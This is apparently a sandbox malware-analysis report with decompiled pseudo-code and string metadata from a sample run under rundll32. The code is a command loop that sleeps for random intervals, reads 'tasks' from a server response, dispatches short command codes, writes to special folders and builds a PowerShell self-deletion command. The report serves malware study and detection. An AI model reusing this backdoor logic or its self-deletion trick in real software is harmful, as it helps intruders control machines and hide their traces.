                                        				if (_t978 !=  *((intOrPtr*)(_t935 - 0x20))) goto 0xf2fea0ea;
                                        				E0000021E21EF2FEB0F0(_t401, _t935 - 0x30);
                                        				_t979 =  *(_t935 - 0x28);
                                        				_t925 =  *((intOrPtr*)(_t935 - 0x30));
                                        				 *(_t935 + 0x1d0) = _t979;
                                        				 *(_t935 + 8) = _t979;
                                        				if (_t979 == 0) goto 0xf2fea10a;
                                        				_t403 = E0000021E21EF2FEBCF0(_t703 >> 5 >> 0x3f, (_t703 >> 5) + (_t703 >> 5 >> 0x3f), _t979, _t935 + 0x240, _t966);
                                        				_t980 = _t979 + 0x70;
                                        				 *(_t935 - 0x28) = _t980;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t403, _t488, _t935 + 0x288), _t488, _t935 + 0x268), _t488, _t935 + 0x240);
                                        				if (_t932 + 0x10 != _t983) goto 0xf2fe9d10;
                                        				r12d =  *((intOrPtr*)(_t935 + 0x5e0));
                                        				r13d = 3;
                                        				r15d = 0;
                                        				if (r12d != 1) goto 0xf2fea70b;
                                        				if (_t925 != _t980) goto 0xf2fea279;
                                        				r8d = E0000021E21EF3111C60(_t703 >> 5 >> 0x3f);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t490 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				if ( *(_t935 + 0xd8) == 0) goto 0xf2fea1a7;
                                        				E0000021E21EF2FEB260(0x28c1979 * r8d, (_t703 >> 5) + (_t703 >> 5 >> 0x3f),  *(_t935 + 0xd8));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				_t709 =  *((intOrPtr*)(_t935 - 0x78));
                                        				if (_t709 - 0x10 < 0) goto 0xf2fea218;
                                        				_t802 =  *((intOrPtr*)(_t936 + 0x70));
                                        				if (_t709 + 1 - _t925 < 0) goto 0xf2fea213;
                                        				if ((_t490 & 0x0000001f) != 0) goto 0xf2fea8bf;
                                        				_t711 =  *((intOrPtr*)(_t802 - 8));
                                        				if (_t711 - _t802 >= 0) goto 0xf2fea8b9;
                                        				_t803 = _t802 - _t711;
                                        				if (_t803 - 8 < 0) goto 0xf2fea8b3;
                                        				if (_t803 - 0x27 > 0) goto 0xf2fea8ad;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t935 - 0x78)) = 0xf;
                                        				 *(_t935 - 0x80) = _t983;
                                        				 *((char*)(_t936 + 0x70)) = 0;
                                        				_t712 =  *((intOrPtr*)(_t935 - 0x38));
                                        				if (_t712 - 0x10 < 0) goto 0xf2fe98ee;
                                        				_t805 =  *((intOrPtr*)(_t935 - 0x50));
                                        				if (_t712 + 1 - _t925 < 0) goto 0xf2fe98e9;
                                        				if ((_t490 & 0x0000001f) != 0) goto 0xf2fea8d7;
                                        				_t714 =  *((intOrPtr*)(_t805 - 8));
                                        				if (_t714 - _t805 >= 0) goto 0xf2fea8d1;
                                        				_t806 = _t805 - _t714;
                                        				if (_t806 - 8 < 0) goto 0xf2fea8cb;
                                        				if (_t806 - 0x27 > 0) goto 0xf2fea8c5;
                                        				goto 0xf2fe98e6;
                                        				r12d = 1;
                                        				_t215 = _t935 + 0x10; // 0x13
                                        				E0000021E21EF2FE5D10(_t535, (_t703 >> 5) + (_t703 >> 5 >> 0x3f), _t215, _t925 + 0x28);
                                        				_t934 =  *((intOrPtr*)(_t925 + 0x18));
                                        				if (_t934 - 0x10 < 0) goto 0xf2fea29d;
                                        				goto 0xf2fea2a0;
                                        				_t744 =  *((intOrPtr*)(_t925 + 0x10));
                                        				_t950 =  <  ? _t744 : 0xffffffff;
                                        				_t599 =  <  ? _t744 : 0xffffffff;
                                        				if (( <  ? _t744 : 0xffffffff) == 0) goto 0xf2fea2c8;
                                        				if (E0000021E21EF310E7C0(_t490, _t925, "shi",  <  ? _t744 : 0xffffffff) != 0) goto 0xf2fea382;
                                        				if (_t744 != 3) goto 0xf2fea382;
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(_t490, 0, 0x1000, _t535, 0xf320b2a0, "shi", _t925,  <  ? _t744 : 0xffffffff);
                                        				E0000021E21EF3111C60(_t714);
                                        				r9d = 0;
                                        				_t224 = _t966 + 0x26; // 0x26
                                        				r8d = _t224;
                                        				__imp__SHGetSpecialFolderPathA();
                                        				lstrcatA(??, ??);
                                        				 *((long long*)(_t935 + 0x170)) = _t714;
                                        				 *((long long*)(_t935 + 0x178)) = _t714;
                                        				 *((long long*)(_t935 + 0x180)) = _t714;
                                        				E0000021E21EF3017F50(_t714, _t744, _t935 + 0x170, _t925, _t934, _t966);
                                        				if ( *((intOrPtr*)(_t935 + 0x180)) == 0) goto 0xf2fea2e0;
                                        				r13d = 3;
                                        				_t232 = _t935 + 0x10; // 0x13
                                        				E0000021E21EF2FE7390(_t714,  *((intOrPtr*)(_t935 + 0x170)),  *((intOrPtr*)(_t935 + 0x178)), _t232, 0xf31b0230);
                                        				goto 0xf2fea618;
                                        				if (_t934 - 0x10 < 0) goto 0xf2fea38d;
                                        				goto 0xf2fea390;
                                        				_t953 =  <  ? _t744 : 0xf31b0230;
                                        				_t605 =  <  ? _t744 : 0xf31b0230;
                                        				if (( <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea3b4;
                                        				if (E0000021E21EF310E7C0(0, _t925, "dij",  <  ? _t744 : 0xf31b0230) != 0) goto 0xf2fea46f;
                                        				if (_t744 != 3) goto 0xf2fea46f;
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(0, 0, 0x1000, _t535, 0xf320b2a0, "dij", _t925,  <  ? _t744 : 0xf31b0230);
                                        				_t423 = E0000021E21EF3111C60(_t714);
                                        				r9d = 0;
                                        				_t241 = _t966 + 0x26; // 0x26
                                        				r8d = _t241;
                                        				__imp__SHGetSpecialFolderPathA();
                                        				lstrcatA(??, ??);
                                        				 *((long long*)(_t935 + 0x158)) = _t714;
                                        				 *((long long*)(_t935 + 0x160)) = _t714;
                                        				 *((long long*)(_t935 + 0x168)) = _t714;
                                        				E0000021E21EF3017F50(_t714, _t744, _t935 + 0x158, _t925, _t934, _t966);
                                        				if ( *((intOrPtr*)(_t935 + 0x168)) == 0) goto 0xf2fea3d0;
                                        				E0000021E21EF2FE7560(_t744,  *((intOrPtr*)(_t935 + 0x158)),  *((intOrPtr*)(_t935 + 0x160)), _t934, _t935, _t935 + 0x10, _t925 + 0x48);
                                        				goto 0xf2fea618;
                                        				if (_t934 - 0x10 < 0) goto 0xf2fea47a;
                                        				goto 0xf2fea47d;
                                        				_t956 =  <  ? _t744 : 0xf31b0230;
                                        				_t611 =  <  ? _t744 : 0xf31b0230;
                                        				if (( <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea49d;
                                        				if (E0000021E21EF310E7C0(0, _t925, "dex",  <  ? _t744 : 0xf31b0230) != 0) goto 0xf2fea504;
                                        				if (_t744 != 3) goto 0xf2fea504;
                                        				r9d = 0;
                                        				r8d = _t744 + 0x19;
                                        				__imp__SHGetSpecialFolderPathA();
                                        				lstrcatA(??, ??);
                                        				_t906 =  >=  ?  *((void*)(_t935 + 0x10)) : _t935 + 0x10;
                                        				r8d =  *(_t935 + 0x20);
                                        				if (E0000021E21EF301B91C(_t714, _t744, 0xf320b2a0,  >=  ?  *((void*)(_t935 + 0x10)) : _t935 + 0x10, _t934, _t925 + 0x48) == 0) goto 0xf2fea620;
                                        				0xf301c460();
                                        				goto 0xf2fea61c;
                                        				if (_t934 - 0x10 < 0) goto 0xf2fea50f;
                                        				goto 0xf2fea512;
                                        				_t958 =  <  ? _t744 : 0xf31b0230;
                                        				_t618 =  <  ? _t744 : 0xf31b0230;
                                        				if (( <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea537;
                                        				if (E0000021E21EF310E7C0(0, _t925, "sdl",  <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea537;
                                        				r15d = 0;
                                        				goto 0xf2fea552;
                                        				if (_t744 - 3 >= 0) goto 0xf2fea545;
                                        				r15d = 0;
                                        				goto 0xf2fea552;
                                        				r15d = 0;
                                        				if ((r15d & 0xffffff00 | _t744 - 0x00000003 > 0x00000000) == 0) goto 0xf2feaab5;
                                        				if (_t934 - 0x10 < 0) goto 0xf2fea565;
                                        				goto 0xf2fea568;
                                        				_t960 =  <  ? _t744 : 0xf31b0230;
                                        				_t625 =  <  ? _t744 : 0xf31b0230;
                                        				if (( <  ? _t744 : 0xf31b0230) == 0) goto 0xf2fea58c;
                                        				if (E0000021E21EF310E7C0(0, _t925, "ins",  <  ? _t744 : 0xf31b0230) != 0) goto 0xf2fea620;
                                        				if (_t744 - 3 >= 0) goto 0xf2fea597;
                                        				goto 0xf2fea5a1;
                                        				_t440 = r15d & 0xffffff00 | _t744 - 0x00000003 > 0x00000000;
                                        				if (_t440 != 0) goto 0xf2fea620;
                                        				if ( *((intOrPtr*)(_t935 + 0x5d8)) == _t440) goto 0xf2fea5e8;
                                        				r8d = E0000021E21EF3111C60(_t714);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t497 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				E0000021E21EF2FE6100(0x28c1979 * r8d, _t497, _t935 + 0x10);
                                        				goto 0xf2fea681;
                                        				 *((char*)(_t936 + 0x20)) = 0;
                                        				_t445 = E0000021E21EF2FE76A0(0x28c1979 * r8d >> 0x20 >> 1, _t744, _t935 + 0x2b0, _t935 + 0x420, _t925, _t934, _t935 + 0x188, _t935 + 0x138, _t974);
                                        				if (_t445 != 0) goto 0xf2fea8dd;
                                        				goto 0xf2fea5ad;
                                        				if (_t445 == 0) goto 0xf2fea620;
                                        				 *((intOrPtr*)(_t925 + 0x68)) = r12d;
                                        				_t715 =  *((intOrPtr*)(_t935 + 0x28));
                                        				if (_t715 - 0x10 < 0) goto 0xf2fea66e;
                                        				_t829 =  *((intOrPtr*)(_t935 + 0x10));
                                        				if (_t715 + 1 - 0x1000 < 0) goto 0xf2fea669;
                                        				if ((_t497 & 0x0000001f) != 0) goto 0xf2feaaaf;
                                        				_t717 =  *((intOrPtr*)(_t829 - 8));
                                        				if (_t717 - _t829 >= 0) goto 0xf2feaaa9;
                                        				_t830 = _t829 - _t717;
                                        				if (_t830 - 8 < 0) goto 0xf2feaaa3;
                                        				if (_t830 - 0x27 > 0) goto 0xf2feaa9d;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t935 + 0x28)) = 0xf;
                                        				r15d = 0;
                                        				 *(_t935 + 0x20) = 0xf31b0230;
                                        				 *((intOrPtr*)(_t935 + 0x10)) = r15b;
                                        				_t926 = _t925 + 0x70;
                                        				if (_t926 != _t980) goto 0xf2fea280;
                                        				r8d = E0000021E21EF3111C60(_t717);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				Sleep(??);
                                        				if ( *(_t935 + 0xd8) == 0) goto 0xf2fea6cd;
                                        				_t449 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t744,  *(_t935 + 0xd8));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t449, r8d * 0x3e8, _t936 + 0x70), r8d * 0x3e8, _t935 - 0x50);
                                        				goto 0xf2fe9742;
                                        				r8d = E0000021E21EF3111C60(_t717);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t501 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				if ( *(_t935 + 0xd8) == 0) goto 0xf2fea74a;
                                        				E0000021E21EF2FEB260(0x28c1979 * r8d, _t744,  *(_t935 + 0xd8));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				_t718 =  *((intOrPtr*)(_t935 - 0x78));
                                        				if (_t718 - 0x10 < 0) goto 0xf2fea7bb;
                                        				_t840 =  *((intOrPtr*)(_t936 + 0x70));
                                        				if (_t718 + 1 - _t926 < 0) goto 0xf2fea7b6;
                                        				if ((_t501 & 0x0000001f) != 0) goto 0xf2feada7;
                                        				_t720 =  *((intOrPtr*)(_t840 - 8));
                                        				if (_t720 - _t840 >= 0) goto 0xf2feada1;
                                        				_t841 = _t840 - _t720;
                                        				if (_t841 - 8 < 0) goto 0xf2fead9b;
                                        				if (_t841 - 0x27 > 0) goto 0xf2fead95;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t935 - 0x78)) = 0xf;
                                        				 *(_t935 - 0x80) = 0xf31b0230;
                                        				 *((char*)(_t936 + 0x70)) = 0;
                                        				_t721 =  *((intOrPtr*)(_t935 - 0x38));
                                        				if (_t721 - 0x10 < 0) goto 0xf2fe98ee;
                                        				_t843 =  *((intOrPtr*)(_t935 - 0x50));
                                        				if (_t721 + 1 - _t926 < 0) goto 0xf2fe98e9;
                                        				if ((_t501 & 0x0000001f) != 0) goto 0xf2feadbf;
                                        				_t723 =  *((intOrPtr*)(_t843 - 8));
                                        				if (_t723 - _t843 >= 0) goto 0xf2feadb9;
                                        				_t844 = _t843 - _t723;
                                        				if (_t844 - 8 < 0) goto 0xf2feadb3;
                                        				if (_t844 - 0x27 > 0) goto 0xf2feadad;
                                        				goto 0xf2fe98e6;
                                        				r8d = E0000021E21EF3111C60(_t723);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				Sleep(??);
                                        				goto 0xf2fe9742;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [ebp+0x2f0], xmm0");
                                        				 *((long long*)(_t935 + 0x300)) = 0xf31b0230;
                                        				r13d =  ==  ? r12d : r13d;
                                        				 *((intOrPtr*)(_t926 + 0x68)) = r13d;
                                        				E0000021E21EF2FEAF10(0x28c1979 * r8d, _t744, _t935 + 0x2f0, _t926);
                                        				 *((long long*)(_t936 + 0x20)) = _t935 + 0x2f0;
                                        				0xf3014e20();
                                        				_t725 = _t935 + 0x50;
                                        				 *((long long*)(_t936 + 0x20)) = _t935 + 0x50;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FF5CD0(_t423 - "dij" + "dij" * 2, r8d * 0x3e8, 0x28c1979 * r8d >> 0x20 >> 1, 0x1000, 0x28c1979 * r8d - 3, _t744, _t935 - 0x70, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t935 + 0x120)), _t934, _t935, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t935 + 0x120)) + 0x20, _t935 + 0x440), r8d * 0x3e8, _t935 - 0x70);
                                        				 *((long long*)(_t935 - 8)) = 0xf31b0230;
                                        				 *_t935 = 0xf31b0230;
                                        				 *_t935 = 0xf;
                                        				 *((long long*)(_t935 - 8)) = 0xf31b0230;
                                        				 *((char*)(_t935 - 0x18)) = 0;
                                        				r8d = 0;
                                        				E0000021E21EF2FE6530(_t744, _t935 - 0x18, _t935 + 0x138, _t926, _t934, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t935 + 0x120)) + 0x20, _t935 + 0x00000440 | 0xffffffff);
                                        				 *((long long*)(_t936 + 0x60)) = 0xf31b0230;
                                        				 *((long long*)(_t936 + 0x68)) = 0xf31b0230;
                                        				 *((long long*)(_t936 + 0x68)) = 0xf;
                                        				 *((long long*)(_t936 + 0x60)) = 0xf31b0230;
                                        				 *((char*)(_t936 + 0x50)) = 0;
                                        				r8d = 0xa;
                                        				E0000021E21EF2FE6400(_t744, _t936 + 0x50, "powershell", _t934, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t935 + 0x120)) + 0x20);
                                        				GetCurrentProcessId();
                                        				E0000021E21EF2FE9020(_t935 + 0x2d0);
                                        				E0000021E21EF2FEB660(_t935 + 0x50, _t935 - 0x70, _t935 + 0x50);
                                        				r8d = r8d ^ r8d;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE82C0(_t744, _t936 + 0x50, _t935 + 0x50, _t926, _t934, _t935, _t935 + 0x50, _t935 + 0x00000440 | 0xffffffffffffffff), r8d * 0x3e8, _t935 - 0x70), r8d * 0x3e8, _t935 + 0x2d0);
                                        				r8d = 0x15;
                                        				E0000021E21EF2FE8170(_t744, _t936 + 0x50, "; Remove-Item -Path \"", _t926, _t935, _t725);
                                        				r8d = 0;
                                        				E0000021E21EF2FE82C0(_t744, _t936 + 0x50, _t935 - 0x18, _t926, _t934, _t935, _t725, _t935 + 0x00000440 | 0xffffffffffffffff);
                                        				r8d = 8;
                                        				E0000021E21EF2FE8170(_t744, _t936 + 0x50, "\" -Force", _t926, _t935, _t725);
                                        				E0000021E21EF2FE8170(_t744, _t936 + 0x50, "\"", _t926, _t935, _t974);
                                        				_t861 =  >=  ?  *((void*)(_t936 + 0x50)) : _t936 + 0x50;
                                        				0xf301c460();
                                        				__imp__CoUninitialize();
                                        				ExitProcess(??);
                                        			}


                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: -Recurse"$" -Force$; Remove-Item -Path "$powershell
                                        • API String ID: 3472027048-3626569723
                                        • Opcode ID: b7370d6ff2a21ae0597d7008802c5dbc846767d2fe6d0dd7cdceceb1a8f8ddb9
                                        • Instruction ID: bdb1031ac08a4bd86f7687f4599668eca3d350fa6efc35189b689c0c27a60f2e
                                        • Opcode Fuzzy Hash: b7370d6ff2a21ae0597d7008802c5dbc846767d2fe6d0dd7cdceceb1a8f8ddb9
                                        • Instruction Fuzzy Hash: 5722BF33221A8685FF21AB74CC493DE23B1F760748F510A159E5A17EDAEF78C686C384
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E0000021E21EF2FE9819() {
                                        				void* _t389;
                                        				signed int _t422;
                                        				void* _t425;
                                        				void* _t427;
                                        				void* _t447;
                                        				signed int _t464;
                                        				void* _t469;
                                        				void* _t473;
                                        				signed char _t511;
                                        				signed char _t514;
                                        				signed char _t516;
                                        				signed char _t523;
                                        				signed char _t527;
                                        				void* _t559;
                                        				void* _t563;
                                        				void* _t698;
                                        				intOrPtr _t699;
                                        				intOrPtr _t701;
                                        				intOrPtr _t702;
                                        				signed long long* _t704;
                                        				intOrPtr _t705;
                                        				intOrPtr _t707;
                                        				intOrPtr _t708;
                                        				intOrPtr _t710;
                                        				signed long long _t712;
                                        				signed long long _t715;
                                        				signed long long _t717;
                                        				signed long long _t720;
                                        				signed int* _t724;
                                        				signed long long _t726;
                                        				signed long long _t729;
                                        				signed long long _t731;
                                        				signed long long _t733;
                                        				signed long long _t736;
                                        				signed long long _t738;
                                        				signed long long _t740;
                                        				signed long long _t743;
                                        				signed long long _t745;
                                        				signed long long _t748;
                                        				signed long long _t750;
                                        				intOrPtr _t756;
                                        				intOrPtr _t758;
                                        				intOrPtr _t759;
                                        				long long _t761;
                                        				intOrPtr _t762;
                                        				intOrPtr _t764;
                                        				intOrPtr _t765;
                                        				intOrPtr _t767;
                                        				intOrPtr _t768;
                                        				intOrPtr _t770;
                                        				void* _t773;
                                        				signed long long _t774;
                                        				signed long long _t775;
                                        				signed long long _t777;
                                        				signed long long _t779;
                                        				signed long long _t781;
                                        				signed long long _t783;
                                        				signed long long _t785;
                                        				void* _t787;
                                        				intOrPtr _t791;
                                        				intOrPtr _t792;
                                        				void* _t793;
                                        				intOrPtr _t795;
                                        				void* _t796;
                                        				intOrPtr _t805;
                                        				void* _t806;
                                        				intOrPtr _t808;
                                        				void* _t809;
                                        				intOrPtr _t855;
                                        				void* _t856;
                                        				intOrPtr _t858;
                                        				void* _t859;
                                        				intOrPtr _t882;
                                        				void* _t883;
                                        				intOrPtr _t893;
                                        				void* _t894;
                                        				intOrPtr _t896;
                                        				void* _t897;
                                        				void* _t914;
                                        				void* _t975;
                                        				signed long long _t976;
                                        				intOrPtr _t978;
                                        				void* _t979;
                                        				void* _t980;
                                        				signed long long _t981;
                                        				signed long long _t985;
                                        				intOrPtr _t987;
                                        				long long* _t988;
                                        				void* _t989;
                                        				signed long long _t992;
                                        				signed long long _t995;
                                        				signed long long _t999;
                                        				void* _t1019;
                                        				void* _t1027;
                                        				signed long long _t1030;
                                        				signed long long _t1031;
                                        				signed long long _t1032;
                                        				signed long long _t1033;
                                        				signed long long _t1034;
                                        				signed long long _t1036;
                                        
                                        				r8d = E0000021E21EF3111C60(_t698);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t511 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				_t699 =  *((intOrPtr*)(_t988 - 0x78));
                                        				if (_t699 - 0x10 < 0) goto 0xf2fe9892;
                                        				_t792 =  *((intOrPtr*)(_t989 + 0x70));
                                        				if (_t699 + 1 - _t975 < 0) goto 0xf2fe988d;
                                        				if ((_t511 & 0x0000001f) != 0) goto 0xf2fea85f;
                                        				_t701 =  *((intOrPtr*)(_t792 - 8));
                                        				if (_t701 - _t792 >= 0) goto 0xf2fea859;
                                        				_t793 = _t792 - _t701;
                                        				if (_t793 - 8 < 0) goto 0xf2fea853;
                                        				if (_t793 - 0x27 > 0) goto 0xf2fea84d;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t988 - 0x78)) = 0xf;
                                        				 *(_t988 - 0x80) = _t1034;
                                        				 *((char*)(_t989 + 0x70)) = 0;
                                        				_t702 =  *((intOrPtr*)(_t988 - 0x38));
                                        				if (_t702 - 0x10 < 0) goto 0xf2fe98ee;
                                        				_t795 =  *((intOrPtr*)(_t988 - 0x50));
                                        				if (_t702 + 1 - _t975 < 0) goto 0xf2fe98e9;
                                        				if ((_t511 & 0x0000001f) != 0) goto 0xf2fea877;
                                        				_t704 =  *((intOrPtr*)(_t795 - 8));
                                        				if (_t704 - _t795 >= 0) goto 0xf2fea871;
                                        				_t796 = _t795 - _t704;
                                        				if (_t796 - 8 < 0) goto 0xf2fea86b;
                                        				if (_t796 - 0x27 > 0) goto 0xf2fea865;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t988 - 0x38)) = 0xf;
                                        				 *(_t988 - 0x40) = _t1034;
                                        				 *((char*)(_t988 - 0x50)) = 0;
                                        				goto 0xf2fe9742;
                                        				if ( *(_t988 + 0x60) == 0) goto 0xf2fe9956;
                                        				_t916 =  >=  ?  *((void*)(_t988 + 0x50)) : _t988 + 0x50;
                                        				r8d =  *(_t988 + 0x60);
                                        				E0000021E21EF2FE1080(_t988 + 0x480,  >=  ?  *((void*)(_t988 + 0x50)) : _t988 + 0x50);
                                        				_t918 =  >=  ?  *((void*)(_t989 + 0x70)) : _t989 + 0x70;
                                        				r8d =  *(_t988 - 0x80);
                                        				E0000021E21EF2FE1290(E0000021E21EF2FE1400( *((long long*)(_t988 - 0x78)) - 0x10, _t988 + 0x480,  >=  ?  *((void*)(_t989 + 0x70)) : _t989 + 0x70), _t988 + 0x480);
                                        				 *(_t988 + 0xc0) = _t704;
                                        				 *(_t988 + 0xc8) = _t704;
                                        				 *((intOrPtr*)(_t988 + 0xce)) = r15w;
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqa [ebp+0xd0], xmm0");
                                        				asm("xorps xmm1, xmm1");
                                        				asm("movdqa [ebp+0xe0], xmm1");
                                        				asm("movdqa [ebp+0xf0], xmm0");
                                        				 *(_t988 + 0x100) = _t1034;
                                        				 *((long long*)(_t988 + 0x108)) = 0x400;
                                        				 *(_t988 + 0x110) = r15d;
                                        				 *(_t988 + 0x118) = _t1034;
                                        				if ( *(_t988 + 0xd0) != _t704) goto 0xf2fe99e9;
                                        				E0000021E21EF310B674(_t704, _t988 + 0x480);
                                        				 *(_t988 + 0x330) = _t704;
                                        				 *_t704 = _t1034;
                                        				_t704[1] = 0x10000;
                                        				_t704[2] = _t1034;
                                        				_t704[3] = _t1034;
                                        				_t704[4] = _t1034;
                                        				 *(_t988 + 0xd0) = _t704;
                                        				 *(_t988 + 0xd8) = _t704;
                                        				_t920 =  >=  ?  *((void*)(_t989 + 0x70)) : _t989 + 0x70;
                                        				_t52 = _t988 + 0xc0; // 0xc3
                                        				E0000021E21EF2FEBB60(_t773, _t52,  >=  ?  *((void*)(_t989 + 0x70)) : _t989 + 0x70, _t980);
                                        				if (_t704[0xa] == 0) goto 0xf2fe9b18;
                                        				r8d = E0000021E21EF3111C60(_t704);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t514 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				if ( *(_t988 + 0xd8) == 0) goto 0xf2fe9a4f;
                                        				_t389 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t773,  *(_t988 + 0xd8));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				_t705 =  *((intOrPtr*)(_t988 - 0x78));
                                        				if (_t705 - 0x10 < 0) goto 0xf2fe9ab7;
                                        				_t805 =  *((intOrPtr*)(_t989 + 0x70));
                                        				if (_t705 + 1 - _t975 < 0) goto 0xf2fe9ab2;
                                        				if ((_t514 & 0x0000001f) != 0) goto 0xf2fea88f;
                                        				_t707 =  *((intOrPtr*)(_t805 - 8));
                                        				if (_t707 - _t805 >= 0) goto 0xf2fea889;
                                        				_t806 = _t805 - _t707;
                                        				if (_t806 - 8 < 0) goto 0xf2fea883;
                                        				if (_t806 - 0x27 > 0) goto 0xf2fea87d;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t988 - 0x78)) = 0xf;
                                        				 *(_t988 - 0x80) = _t1034;
                                        				 *((char*)(_t989 + 0x70)) = 0;
                                        				_t708 =  *((intOrPtr*)(_t988 - 0x38));
                                        				if (_t708 - 0x10 < 0) goto 0xf2fe98ee;
                                        				_t808 =  *((intOrPtr*)(_t988 - 0x50));
                                        				if (_t708 + 1 - _t975 < 0) goto 0xf2fe98e9;
                                        				if ((_t514 & 0x0000001f) != 0) goto 0xf2fea8a7;
                                        				_t710 =  *((intOrPtr*)(_t808 - 8));
                                        				if (_t710 - _t808 >= 0) goto 0xf2fea8a1;
                                        				_t809 = _t808 - _t710;
                                        				if (_t809 - 8 < 0) goto 0xf2fea89b;
                                        				if (_t809 - 0x27 > 0) goto 0xf2fea895;
                                        				goto 0xf2fe98e6;
                                        				_t976 =  *((intOrPtr*)(_t988 - 0x30));
                                        				_t774 = _t976;
                                        				 *(_t988 + 8) = _t774;
                                        				_t981 =  *(_t988 - 0x28);
                                        				if (_t976 == _t981) goto 0xf2fe9b59;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t389, _t514, _t774 + 0x48), _t514, _t774 + 0x28), _t514, _t774);
                                        				_t775 = _t774 + 0x70;
                                        				 *(_t988 + 8) = _t775;
                                        				if (_t775 != _t981) goto 0xf2fe9b30;
                                        				_t1030 = _t976;
                                        				 *(_t988 - 0x28) = _t976;
                                        				if ( *((short*)(_t988 + 0xce)) != 3) goto 0xf2fea70b;
                                        				_t712 =  *(_t988 + 0xc8) & 0xffffffff;
                                        				_t777 = (_t775 << 5) + _t712;
                                        				_t84 = _t988 + 0x338; // 0x33b
                                        				_t85 = _t988 + 0xc0; // 0xc3
                                        				E0000021E21EF2FEB470(_t559, _t777, _t85, _t84, 0xffffffff, _t988, "response_status");
                                        				if ( *_t712 == _t777) goto 0xf2fe9c02;
                                        				 *(_t988 + 0x40) = _t712;
                                        				 *(_t988 + 0x48) = _t712;
                                        				 *((short*)(_t988 + 0x4e)) = 0x405;
                                        				_t715 =  *(_t988 + 0x48) & 0x00000000 | "response_status";
                                        				 *(_t988 + 0x48) = _t715;
                                        				 *(_t988 + 0x40) = 0xf;
                                        				E0000021E21EF2FEBA50(_t988 + 0xc0, _t988 + 0x40, _t976, 0xffffffff, _t988, _t1030, _t1034);
                                        				r12d =  *_t715;
                                        				 *((intOrPtr*)(_t988 + 0x5e0)) = r12d;
                                        				_t717 =  *(_t988 + 0xc8) & 0xffffffff;
                                        				_t779 = (_t777 << 5) + _t717;
                                        				_t97 = _t988 + 0x340; // 0x343
                                        				_t98 = _t988 + 0xc0; // 0xc3
                                        				E0000021E21EF2FEB470(_t559, _t779, _t98, _t97, 0xffffffff, _t988, "tasks");
                                        				if ( *_t717 == _t779) goto 0xf2fea155;
                                        				 *(_t988 + 0x30) = _t717;
